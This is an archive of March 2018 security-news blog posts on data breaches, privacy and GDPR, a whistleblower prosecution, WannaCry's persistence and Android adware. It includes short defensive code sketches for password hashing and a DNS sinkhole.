Monthly Archives: March 2018

New Traffic Light Protocol (TLP) levels for 2018

The Traffic Light Protocol should be familiar to anyone working with sensitive data, with levels RED, AMBER, GREEN and WHITE being used to specify how far information can be shared. In recent years it has become clear that these four levels are not enough, so the United Nations International Committee on Responsible Naming (UN/ICoRN) has introduced nine new TLP levels for implementation from the…

Privacy protections are needed for government overreach, too

After the unfortunate yet predictable Facebook episode involving Cambridge Analytica, several leaders in the technology industry were quick to pledge they would never allow that kind of corporate misuse of user data.

The fine print in those pledges, of course, is the word ‘corporate,’ and it’s exposed a glaring weakness in the privacy protections that technology companies have brought to bear.

Last week at IBM Think 2018, Big Blue’s CEO Ginni Rometty stressed the importance of “data trust and responsibility” and called on not only technology companies but all enterprises to be better stewards of data. She was joined by IBM customers who echoed those remarks; for example, Lowell McAdam, chairman and CEO of Verizon Communications, said he didn’t ever want to be in the position that some Silicon Valley companies had found themselves following data misuse or exposures, lamenting that once users’ trust has been broken it can never be repaired.

Other companies piled on the Facebook controversy and played up their privacy protections for users. Speaking at a televised town hall event for MSNBC this week, Apple CEO Tim Cook called privacy “a human right” and criticized Facebook, saying he “wouldn’t be in this situation.” Apple followed Cook’s remarks by unveiling new privacy features related to the European Union’s General Data Protection Regulation.

Those pledges and actions are important, but they ignore a critical threat to privacy: government overreach. The omission of that threat might be purposeful. Verizon, for example, found itself in the crosshairs of privacy advocates in 2013 following the publication of National Security Agency (NSA) documents leaked by Edward Snowden. Those documents revealed the telecom giant was delivering American citizens’ phone records to the NSA under a secret court order for bulk surveillance.

In addition, Apple has taken heat for its decision to remove VPN and encrypted messaging apps from its App Store in China following pressure from the Chinese government. And while Tim Cook’s company deserved recognition for defending encryption from the FBI’s “going dark” effort, it should be noted that Apple (along with Google, Microsoft and of course Facebook) supported the CLOUD Act, which was recently approved by Congress and has roiled privacy activists.

The misuse of private data at the hands of greedy or unethical corporations is a serious threat to users’ security, but it’s not the only predator in the forest. Users should demand strong privacy protections from all threats, including bulk surveillance and warrantless spying, and we shouldn’t allow companies to pay lip service to privacy rights only when the aggressor is a corporate entity.

Rometty made an important statement at IBM Think when she said she believes all companies will be judged by how well they protect their users’ data. That’s true, but there should be no exemptions for what they will protect that data from, and no denials about the dangers of government overreach.

The post Privacy protections are needed for government overreach, too appeared first on Security Bytes.

Weekly Cyber Risk Roundup: MyFitnessPal Breach, Carbanak Leader Arrested

Under Armour announced this week that approximately 150 million users of the diet and fitness app MyFitnessPal had their personal information acquired by an unauthorized third party sometime in February 2018. As Reuters noted, it is the largest data breach of 2018 in terms of the number of records affected.

The breach was discovered on March 25, and the data compromised includes usernames, email addresses, and hashed passwords — the majority of which used bcrypt, the company said.
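That detail matters: salted, deliberately slow password hashes like bcrypt are what make a stolen password database expensive to crack. A rough sketch of the idea, using Python's standard-library PBKDF2 here rather than bcrypt itself (which is a third-party package), since the salt-plus-slow-hash principle is the same:

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # deliberately slow, to make brute-force guessing expensive

def hash_password(password):
    """Return (salt, digest); the random per-user salt defeats precomputed tables."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # → True
print(verify_password("wrong guess", salt, digest))                   # → False
```

An attacker who steals only salts and digests must guess each password and re-run the slow hash per guess, which is why "hashed with bcrypt" is meaningfully better news than "stored in plain text."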

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users,” the company said in a statement. “Payment card data was not affected because it is collected and processed separately.”

MyFitnessPal also said that it will require users to change their passwords and is urging them to do so immediately. The company is also urging users to review their accounts for suspicious activity and to change the password on any other online account that used the same or a similar password to their now-breached MyFitnessPal credentials.

It is unclear how the unauthorized third party acquired the data, and the investigation is ongoing. Under Armour bought MyFitnessPal in February 2015 for $475 million.


Other trending cybercrime events from the week include:

  • Employee accounts targeted: The Retirement Advantage is notifying clients that their employees’ personal information may have been compromised due to unauthorized access to an employee email account at its Applied Plan Administrators division. Stormont in Northern Ireland is warning all staff of a cyber-attack that targeted email accounts with numerous password-guessing attempts and compromised a number of accounts. Shutterfly is notifying customers that their personal information may have been compromised due to an employee’s credentials being used without authorization to access its Workday test environment.
  • Payment card breaches: Manduka is notifying customers of a year-long payment card breach after discovering malware on its e-commerce web platform. Mintie Corporation is notifying customers of a ransomware attack that may have compromised customer payment card information. Fred Usinger said its hosting service provider notified the company of a breach involving personal information and stored payment information.
  • Other data breaches: A report from New York’s Attorney General said that 9.2 million New Yorkers had their data exposed in 2017, quadruple the number from 2016. Motherboard obtained thousands of user account details that are circulating on public image boards, and many of those accounts are related to a bestiality website. Mendes & Haney is notifying customers of unauthorized access to its network. Branton, de Jong and Associates is notifying customers that their tax information may have been compromised due to unauthorized access to its tax program. Researchers discovered a misconfigured database belonging to the New York internal medicine and cardiovascular health practice Cohen Bergman Klepper Romano Mds PC that exposed the patient information of 42,000 individuals.
  • Other notable events: Baltimore’s 911 dispatch system was temporarily shut down after a hack by an unknown actor led to “limited breach” of the system that supports the city’s 911 and 311 services. Kent NHS Trust is notifying patients that a staff member who had accessed their medical records “without a legitimate business reason” has been dismissed. The Malaysian central bank said it thwarted a cyber-attack that involved falsified wire-transfer requests over the SWIFT bank messaging network. Boeing said that a few machines were infected with the WannaCry malware.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Law enforcement officials in Spain have arrested the alleged leader of the cybercriminal syndicate behind the Carbanak and Cobalt malware attacks, which have targeted more than 100 financial organizations around the world and caused cumulative losses of over €1 billion since 2013.

Europol’s press release did not name the alleged mastermind behind the group; however, Bloomberg reported that Spain’s Interior Ministry named the suspect as Denis K, a Ukrainian national who had accumulated about 15,000 bitcoins (worth approximately $120 million at the time of his arrest). Europol noted that numerous other coders, mule networks, and money launderers connected to the group were also the target of the international law enforcement operation.

The group first used the Anunak malware in 2013 to target financial transfers and ATM networks, and by the following year they had created a more sophisticated version of the malware known as Carbanak, which the group used until 2016. At that point the group carried out an even more sophisticated wave of attacks using custom-made malware based on the Cobalt Strike penetration testing software, Europol said.

“The criminals would send out to bank employees spear phishing emails with a malicious attachment impersonating legitimate companies,” Europol wrote in a press release. “Once downloaded, the malicious software allowed the criminals to remotely control the victims’ infected machines, giving them access to the internal banking network and infecting the servers controlling the ATMs. This provided them with the knowledge they needed to cash out the money.”

Carlos Yuste, a Spanish police chief inspector who helped lead the operation, told Bloomberg that “the head has been cut off” of the high-profile group. Steven Wilson, Head of Europol’s European Cybercrime Centre, said that the arrest illustrates how law enforcement “is having a major impact on top level cybercriminality.”

High Quality Problems – Paul’s Security Weekly #553

This week, Executive Director of Source Boston 2018 Rob Cheyne joins us for an interview! Paul delivers the Technical Segment this week entitled, Cutting The Cord: The Ideal Home Network Setup! In the Security News, we have updates from Apple macOS, Windows 7 Meltdown patch, Atlanta’s Ransomware attack, a special appearance in the Security News from Apollo Clark, and more on this episode of Paul’s Security Weekly!


MyFitnessPal, Panera Bread, Saks Fifth Avenue: What to Know About the Recent Data Breaches

This blog has been updated as of 4/4.

Practically everything has become digitized in 2018. We’ve developed thousands of health apps and gadgets to monitor our fitness, implemented online ordering services for restaurants, and more. And just this past week, two of these very innovations were breached for customer data, along with two traditional brick-and-mortar retailers. MyFitnessPal, Panera Bread, and Saks Fifth Avenue and Lord & Taylor have all been hit by data breaches that compromised the data of millions of customers.

Let’s start with MyFitnessPal. Just last week, it was revealed that 150 million accounts for the health app and site were breached. As of now, few details have emerged about how the attack happened or what the intention was behind it. While the breach did not compromise financial data, large troves of other personal information were affected. The impacted information included usernames, email addresses, and hashed passwords.

MyFitnessPal, which is a subsidiary of Under Armour, has notified affected customers of the breach (see below), and Under Armour has released an official statement making the public aware of the attack as well.

Then there’s Panera Bread. The popular food chain actually leaked customer data on its website in plain text. This data includes names, email addresses, home addresses, birth dates, and the final four digits of credit card numbers. It’s not yet clear whether anyone malicious actually accessed this data, which was supplied by customers who had made online accounts for food delivery and other services. What’s more, a security researcher first flagged this error to Panera Bread eight months ago, but the company did not acknowledge it until just now. And though the initial number of impacted users was said to be fewer than 10,000 customers, security reporter Brian Krebs estimates that as many as 37 million Panera members may have been caught up in the breach.

Finally there’s Saks Fifth Avenue and Lord & Taylor. A group of cybercriminals has obtained more than five million credit and debit card numbers from customers of the two high-end clothing stores. It appears this data was stolen using software implanted into the cash register systems at brick-and-mortar stores to siphon card numbers.

So, for the millions of affected MyFitnessPal, Panera Bread, and Saks and Lord & Taylor customers, the question is – what next? There are a few security steps these users should take immediately. Start by following these pointers below:

  • Change your password immediately. If you are a MyFitnessPal or Panera Bread customer, you should first and foremost change the password to your account. Then change the password on any other account where you used the same or a similar password as your MyFitnessPal or Panera Bread account.
  • Stay vigilant. Another way cybercriminals can leverage stolen emails is by using the list for phishing email distribution. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided. Better to just delete the email entirely.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With these breaches, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.


The post MyFitnessPal, Panera Bread, Saks Fifth Avenue: What to Know About the Recent Data Breaches appeared first on McAfee Blogs.

Apple GDPR privacy protection will float everyone’s privacy boat

With less than two months before the European Union’s General Data Protection Regulation goes into effect, Apple is making notable changes in the name of user privacy. For everyone.

While all companies that collect data from EU data subjects will be subject to the GDPR, Apple has stepped up to announce that privacy, being a fundamental human right, should be available to everyone, including those outside the protection of the EU.

In a move that is raising hope for anyone concerned about data privacy, Apple GDPR protections will be offered to all Apple customers, not just the EU data subjects covered by the GDPR.

The new privacy features are part of Apple’s latest updates to its operating systems — macOS 10.13.4, iOS 11.3 and tvOS 11.3 — released on Thursday. The most obvious change, for now, will be a new splash screen detailing Apple’s privacy policy as well as a new icon that will be displayed when an Apple feature wants to collect personal information.

More Apple GDPR support will come later this year when the web page for managing Apple ID accounts is updated to allow easier access to key privacy features mandated under the EU privacy protection regulation, including downloading a copy of all their personal data stored by Apple, correcting account information and temporarily deactivating or permanently deleting the account. The Apple GDPR features will roll out to the EU first after GDPR enforcement begins, but eventually they will be available to every Apple customer no matter where they are.

Apple GDPR protections for all

Speaking at a town-hall event sponsored by MSNBC the day before the big update release, Apple CEO Tim Cook stressed the company profits from the sale of hardware — not the sale of personal data collected on its customers. Cook also took a shot at Facebook for its latest troubles related to allowing improper use of personal data by Cambridge Analytica, saying that privacy is a fundamental human right — a sentiment also spelled out in the splash screen displayed by Apple’s new OS versions.

Anyone concerned about data privacy should welcome Apple’s move, but it may not be as easy for other companies to follow Apple’s lead on data privacy, even with the need to comply with GDPR.

The great thing about Apple’s GDPR-compliance-for-everyone move is that it shows the way for other companies, who now face a clear choice: rather than maintaining two different systems of privacy protections, they can raise the ethical bar for maintaining and supporting personal data privacy to the highest standard, the one set by the GDPR rules, or they can go to the effort and expense of complying with GDPR only to the extent the law requires.

On the one hand, there is the requirement for GDPR compliance regarding EU data subjects, where consumers are granted the right to be forgotten and the right to be notified when their data has been compromised, among other rights. On the other hand, companies can choose to continue to collect and trade the personal data of non-EU data subjects, avoiding consequences for privacy violations against those people by complying only with the minimal protections required by the patchwork of less stringent legislation in effect in the rest of the world.

While a technology company like Apple can focus its efforts on selling hardware while protecting its customers’ data, it remains to be seen what the big internet companies — like Facebook, Google, Amazon and Twitter — will do.

Companies whose business models depend on the unfettered collection, use and sale of consumer data may opt to build a two-tier privacy model: more protection for EU residents under GDPR, and less protection for everyone else.

As a member of the “everyone else” group, I’d rather not be treated like a second-class citizen when it comes to privacy rights.

The post Apple GDPR privacy protection will float everyone’s privacy boat appeared first on Security Bytes.

The accused FBI whistleblower indicted by Trump’s DOJ allegedly leaked secret rules for spying on reporters

DIOG cover

The Trump Justice Department escalated its crackdown on journalists’ sources and whistleblowers this week, charging former FBI special agent Terry Albury with two counts under the Espionage Act for allegedly leaking information to an unnamed news outlet, widely believed to be The Intercept.

The case is yet another example of the outrageous, and recently far too common, use of the World War I-era law to persecute the sources of journalists for the crime of informing the American public. The fact that whistleblowers have been thrown in jail with increasing regularity using a law meant for spies should be an outright scandal. As First Look Media, The Intercept’s parent company, said through their Press Freedom Fund, “The misuse of the Espionage Act chills truth tellers, impedes investigative reporting, and compromises the democratic process.”

But it’s also important to understand what Mr. Albury is alleged to have leaked and how it makes him a true whistleblower. News reports indicate he is accused of providing The Intercept documents related to its “FBI’s Secret Rules” reporting project, an important series of articles that looks into how the FBI secretly conducts investigations.

Notably, the very first story The Intercept published in that series was about a document containing the FBI’s classified rules for specifically targeting journalists with National Security Letters (NSLs), the controversial and due process-free surveillance tool that the agency can serve on telecom companies like AT&T and Verizon to spy on journalists and root out their sources.

The Justice Department’s strict rules for when it can and can’t conduct surveillance of journalists are supposed to be governed by the agency’s “media guidelines,” which the Obama administration updated and strengthened after several embarrassing scandals in which the Obama-era Justice Department was caught surveilling journalists. But critically, NSLs are completely exempt from those rules.

Instead, the rules for using NSLs against journalists are in the classified appendix of the FBI’s “Domestic Investigations and Operations Guide” (DIOG), under the heading “National Security Letters for Telephone Toll Records of Members of the News Media or Media Organizations.” The secret rules allow the Justice Department to use NSLs with virtually none of the restrictions or safeguards that would be in place if it attempted to get a subpoena or court order for a journalist’s private telephone toll records. You can see the leaked version of the rules here:

Along with the Knight First Amendment Institute at Columbia, we are currently suing the Justice Department under the Freedom of Information Act for the current versions of these documents.

But as you can see from the leaked 2013 version, it’s absurd these rules were ever classified in the first place. There’s nothing “damaging” to national security in the public knowing that the FBI’s “approval requirements” consist of merely getting an additional sign-off from a superior to target a journalist with an NSL. It’s clear from looking at the document that the classification system is being abused to cover up embarrassing and controversial practices that have no business being stamped secret.

Instead, it’s likely that the government wants these rules kept secret so that the FBI can continue to circumvent the DOJ media guidelines and spy on journalists in secret, without facing any public scrutiny of the practice.

The prosecution of Mr. Albury is outrageous, but if he was The Intercept’s source, then he exposed the government’s secret powers to spy on news organizations with no oversight. For that, he should be viewed by journalists as a hero.

Disclosure: First Look Media, The Intercept’s parent company, provides Freedom of the Press Foundation with an annual grant and three employees of First Look, Glenn Greenwald, Laura Poitras, and Micah Lee, sit on FPF’s board. They were not consulted in the drafting of this blog post.

How the Rubber Meets the Road in Human-Machine Teaming

Everywhere you turn today, machine learning and artificial intelligence are being hyped as both a menace to and the savior of the human race. This is perhaps especially true in cybersecurity.

What these alluring terms usually mean is simply related to detailed statistical comparisons derived from massive data collections. Let’s look at the terms themselves:

  • Machine Learning describes algorithms that can statistically compare patterns and similarities in a set of data and provide useful information without being explicitly programmed to do so.
  • Artificial Intelligence describes programs that go a step further, taking the useful information from machine learning and applying it directly to a pain area to mimic reason and problem-solving and make decisions automatically.
  • Human-Machine Teaming, which our CTO Steve Grobman urges for cybersecurity, describes automating enough of the important security work that people are freed to perform strategic analysis and problem-solving.
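As a toy illustration of the "statistical comparison" idea in the first bullet (the feature vectors and labels below are hypothetical, not drawn from any McAfee product), a nearest-centroid classifier learns a per-class average from labeled examples and then labels new points by whichever average they sit closest to:

```python
# Toy nearest-centroid classifier. Each feature vector might represent, say,
# [requests per minute, bytes per request] for a host on the network.

def centroid(points):
    # Average each dimension across all points in the class.
    return [sum(values) / len(points) for values in zip(*points)]

def distance_sq(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b))

def train(labeled):
    # labeled: {class label: list of feature vectors}
    return {label: centroid(vectors) for label, vectors in labeled.items()}

def classify(model, vector):
    # Pick the class whose centroid is nearest to the new observation.
    return min(model, key=lambda label: distance_sq(model[label], vector))

model = train({
    "benign":     [[5, 200], [8, 180], [6, 220]],
    "suspicious": [[90, 40], [120, 35], [100, 50]],
})
print(classify(model, [110, 45]))  # → suspicious
print(classify(model, [7, 210]))   # → benign
```

Nothing here was explicitly programmed with a rule like "more than 100 requests per minute is bad"; the pattern emerges from the data, which is the essence of the machine-learning bullet above. Real products layer far more sophisticated models on vastly larger data sets, but the statistical-comparison core is the same.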

At McAfee we are urging our customers to take a long and comprehensive view of human-machine teaming that looks beyond the current, cool-factor buzz. You can make it real, make it practical, and make it scalable, but what does that look like? In a white paper called “Driving Toward a Better Understanding of Machine Learning,” I recently gave an analogy that can help business people understand this topic. You can download it here.

As a metaphor representing malware threats, I introduced the concept of malicious autonomous cars: self-driving cars that have been programmed to do bad things. For example, posing as taxis, malicious autonomous cars could trick and kidnap people. (Much the way ransomware could masquerade as an email attachment, then “kidnap” your critical user files, and demand payment.)

The machines are learning, and to stay secure we must learn as well. Let’s do it together.

The post How the Rubber Meets the Road in Human-Machine Teaming appeared first on McAfee Blogs.

State of Software Security: Checking the Pulse of the Healthcare Industry

Over the past year, our scans of thousands of applications and billions of lines of code found widespread weaknesses in applications, which are a top target of cyber attackers. And when you zoom in from a big-picture view down to a micro level, there are a few industries that are struggling to keep up with the rapidly changing cybersecurity landscape and combat the tactics of today’s malicious actors.

One of these sectors is healthcare. Healthcare organizations hold some of the most sensitive personal data, yet they have been victims of several high-profile breaches in recent years. In 2017 alone, healthcare data breaches increased, with one breach impacting more than one million individuals and 14 breaches of more than 100,000 records each. According to the CA Veracode 2017 State of Software Security report (SOSS), which includes scan data collected from our own platform over the past year, healthcare organizations made security strides, increasing OWASP policy compliance by an average of nine percent between an application’s first and last scan. But healthcare applications had a high prevalence of flaws in the information leakage (55 percent) and cryptographic issues (52 percent) categories.

The Raw State of Untested Software

In theory, the growing awareness of security within the developer community should be prodding the overall body of coders to improve their daily programming best practices. Unfortunately, the stats don’t reflect this. We saw OWASP pass rates, for example, drop by about eight percentage points from last year. However, this may be related to the new companies added to the scan, including healthcare, hospitality and retail apps being scanned for the first time this year.

On the bright side, OWASP pass rates have improved by a statistically significant margin compared to our initial data in 2010. And when organizations first scan their applications for vulnerabilities, they’re bound to find flaws. Still, we had hoped that our research into vulnerability prevalence would show a little improvement in the raw state of software before security testing. If you’re looking for a silver lining, note that the lowest-performing industries in last year’s SOSS study (healthcare and government) experienced the smallest declines in pass rate year over year. That silver lining becomes a mere sliver when you look at the percentage of applications affected by the top three vulnerability categories in the healthcare industry: information leakage (55.2 percent), cryptographic issues (51.5 percent), and code quality (35.1 percent).

And this year, we also took a peek at how many applications within an industry were undergoing their first policy scan as compared to the rest of the portfolio under current testing. A higher percentage of applications undergoing their first policy scan, as in healthcare, tends to suggest that those organizations are just getting started with their application security maturity process.

Meanwhile, healthcare was among the industries that onboarded the most applications relative to the size of their portfolios. This could go a long way toward explaining their good performance in remediation from first scan to latest scan. With so many new applications added, these industries likely were able to take care of a lot of low-hanging fruit, namely easy-to-fix flaws that were newly found.

How to Scale Up Security Success

The good news is that it’s not all doom and gloom. For instance, the latest SOSS report highlights that manufacturing and aerospace organizations have already made security part of their software development process. As a result, they have the highest OWASP pass rate on latest scan (30.5 percent) of any industry grouping, and the lowest proportion of applications undergoing their first assessment (nearly 40 percent). It goes to show that if you stick with a solid security program, improve security through testing, and give your developers the resources they need for testing and remediation, then any industry can improve its application security posture, including healthcare.

Our research shows that organizations that do testing and remediation are prioritizing the worst vulnerabilities, reducing flaw density on very high and high severity flaws at twice the clip of the overall field of vulnerabilities. Nevertheless, only 14 percent of the most severe flaws are fixed in under a month, and nearly 12 percent of applications have at least one high or very high severity flaw.

The latest SOSS report gives us reason to think long and hard about where we need to go in order to achieve AppSec maturity. And while it seems like we are moving the application security needle slowly, there is a bright light at the end of the tunnel. With the right program in place, all industries can improve the state of software security. Looking to improve AppSec in your organization? Consider testing early and often, give developers the resources they need, and fix what you can, starting with the bugs that matter most.


WannaCry after one year

In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago.

It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this from watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, has whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry.

Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit).

Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug in an unpatched computer onto the raw Internet, without the benefit of a firewall, it'll get infected within an hour.

However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories implies some nefarious hacker activity that "targeted" Boeing, but that's unlikely.

We now have over 15 years of experience with network worms getting into strange places that are disconnected, and even "air gapped", from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, and thus a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop.

Another cause of infection is virtual machines. A common practice is to take "snapshots" of live machines and save them as backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed-up running image. If that image is infected, bringing it back up lets the worm start spreading again.

Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup: the worm stops itself if it can resolve a certain domain. Manufacturing networks are disconnected enough from the Internet that such DNS lookups fail, so the domain can't be found, so the killswitch never fires. Thus, manufacturing systems are no more likely to get infected, but the lack of a killswitch means the virus keeps running, attacking more systems instead of immediately killing itself.

One solution would be to set up sinkhole DNS servers on the network that resolve all unknown DNS queries to a single server that logs every request. This is trivial to set up with most DNS servers. The logs will quickly identify problems on the network, as well as any hacker or virus activity. The side effect is that it would make this killswitch kill WannaCry. WannaCry isn't sufficient reason on its own to set up sinkhole servers, of course, but it's something I've found generally useful in the past.
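As one sketch of such a sinkhole (using dnsmasq; the sinkhole address and log path are placeholders, and other DNS servers can do the same thing):

```
# dnsmasq sinkhole configuration (illustrative)
# Resolve ALL domains to the logging server at 192.0.2.10.
address=/#/192.0.2.10
# Log every query so the sinkhole server's logs reveal worm/hacker activity.
log-queries
log-facility=/var/log/dnsmasq-sinkhole.log
```

Note that on such a network, the WannaCry killswitch domain would now resolve, triggering the killswitch.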


Something obviously happened to the Boeing plant, but the narrative is all wrong. Words like "targeted attack" imply things that likely didn't happen. Facts are so loose in cybersecurity that it may not have even been WannaCry.

The real story is that the original WannaCry is still out there, still trying to spread. Simply put a computer on the raw Internet (without a firewall) and you'll get attacked. That, somehow, isn't news. Instead, what's news is whenever that continued infection hits somewhere famous, like Boeing, even though (as Boeing claims) it had no important effect.

Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times

The amount we use our apps, and the number of apps we use, show no signs of slowing. And as the McAfee Labs Threats Report: March 2018 tells us, mobile malware shows no signs of slowing either. Now, a tricky Android malware dubbed Andr/HiddnAd-AJ is adding to the plethora of mobile strains out there. The malware managed to sneak onto the Google Play Store disguised as seven different apps – which have collectively been downloaded over 500,000 times.

Slipping onto the Google Play store via six QR reader apps and one smart compass app, the malware manages to sneak past security checks through a combination of unique code and no initial malicious activity. Following installation, Andr/HiddnAd-AJ waits for six hours before it serves up adware. When it does, it floods a user’s screen with full-screen ads, opens ads on web pages, and sends various notifications containing ad-related links, all with the goal of generating click-based revenue for the attackers.

These apps have since been taken down by Google; however, it's still crucial that Android users stay on the lookout for Andr/HiddnAd-AJ malware and other adware schemes like it. Start by following these security tips:

  • Do your homework. Before you download an app, head to the reviews section of the app store first. Thoroughly sift through the reviews and read the comments; Andr/HiddnAd-AJ might have been avoided if users had read the comments noting that the app was full of unnecessary advertisements. When in doubt, don't download any app that seems remotely questionable.
  • Limit the number of apps. Only install apps you think you need and will use regularly. And if you no longer use an app, uninstall it. This will help you save memory and reduce your exposure to threats such as Andr/HiddnAd-AJ.
  • Don’t click. This may go without saying, but since this is a click-generated revenue scheme, do whatever you can to avoid clicking pop-ups and unwarranted advertisements. The less you click, the less cybercriminals will profit.
  • Use a mobile security solution. As malware and adware campaigns continue to infect mobile applications, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times appeared first on McAfee Blogs.

The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day

At one point in my career, I was responsible for launching massive websites.  We’d talk about when and how we flip the switch to launch the new website.  At least once during every project someone would ask me who got to flip the switch, as though we would have a dignitary (or them?) do it.  But depending on the year, the flipping on of a website was handled through technology and not very dramatic and not with the fanfare the non-technologists hoped for. (Dimming lights? Fireworks?  It was New York and it was publishing, so there was often beer and wine and maybe T-shirts after, but everyone went home and slept.)

And now we have May 25th coming around the corner. The other day, I got a picture in a text from a colleague of a can of sardines.  It took me a minute to realize the expiration was May 25.  So, other than the sardines, what happens?  Are we done?

First the bad news:  We won’t ever be done.  GDPR requires constant diligence for its principles, recurring reviews of the processes we’ve built; ongoing use of Data Processing Impact Assessments; vigilance on how we process, store, transfer, use personal data; communications with our customers; new contractual language and new things to negotiate; ongoing discussions around security and what is appropriate.  And of course, the biggest question: What will the data regulators do?  Will there be an immediate fine? (My bet is no.)

But now the good news: If you’ve been doing this right and have managed to focus on the concepts of Great Data Protection Rocks and a culture of security, the following things may have happened:

  • You have a much better idea of what data you have, where it is stored, who can get to it, and how it gets used. Hopefully you have deleted some data and have additional automated processes to delete data when it ceases to be needed.
  • You have processes in place to replace things that were being done on the fly. Maybe there’s some documentation and someone officially designated to help with the processes.
  • You know who your vendors are, and more about your high-risk and cloud vendors.
  • You have determined what needs securing and made sure you are securing it “appropriately.”
  • You’ve got a team of people who understand data protection and GDPR – maybe some new friends and some new project partners. A few of them may not have bought in completely (the people who were “voluntold” to help), but just wait.  Something often seems to happen in the doubter’s personal life that makes them get it – and big time.  Real examples:  Mortgage application reveals massive identity theft that needs to be fixed or they lose the house; soccer coach sends kid’s medical condition info to the whole team’s parents; intern (not at McAfee!) sends spreadsheet of fraternity members’ contact info, but it also contained everyone’s grade-point average.

Perhaps most importantly, your company now has momentum around doing the right thing regarding data protection.  And May 25th will come – too soon, not soon enough, or both! – and the lights won’t dim but there might be T-shirts.

It would be easy to forget GDPR’s lessons. In the United States, Monday, May 28th, is Memorial Day, and we pull out summer clothes, take off to mark the start of summer, and remember our heroes.  But on that Monday and Tuesday and every day after, Great Data Protection will still Rock, and we will still need to look at data, how it’s used, and how our culture can protect it. Just maybe throw out the sardines if they don’t get eaten beforehand (or leave them on the doubter’s desk as a joke).

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only; it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit, promise, or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day appeared first on McAfee Blogs.

Introducing @FOIAFeed, a Twitter bot that finds and shares Freedom of Information Act journalism


Freedom of the Press Foundation is launching @FOIAFeed today, a new project that aims to automatically find and surface reporting that uses the Freedom of Information Act or other public records laws to obtain source material.

@FOIAFeed is a Twitter bot that reads stories as they are published from over a dozen major news organizations, and posts links and excerpts to Twitter whenever it finds a relevant article. In our experience so far, the bot turns up new and important stories nearly every day. You can follow @FOIAFeed here.

There’s no doubt that the FOIA process is cumbersome, and in some ways, badly broken. But investigative journalism that digs into primary source documents obtained through public records laws is interesting and substantial work, and we like to shine a spotlight on that reporting.

@FOIAFeed's results show that public records laws enable that kind of investigation across a broad cross-section of subjects. In just the last few days, it has posted stories about the political rise of certain career officials in the Trump administration, links between campaign contributions and sting operations against men who patronize sex workers, and apparent age discrimination among employees at tech giant IBM.

Public records as a through-line between this diverse array of stories may not be obvious, but we hope that people interested in the mechanics of journalism will get some value out of seeing these stories compiled together.

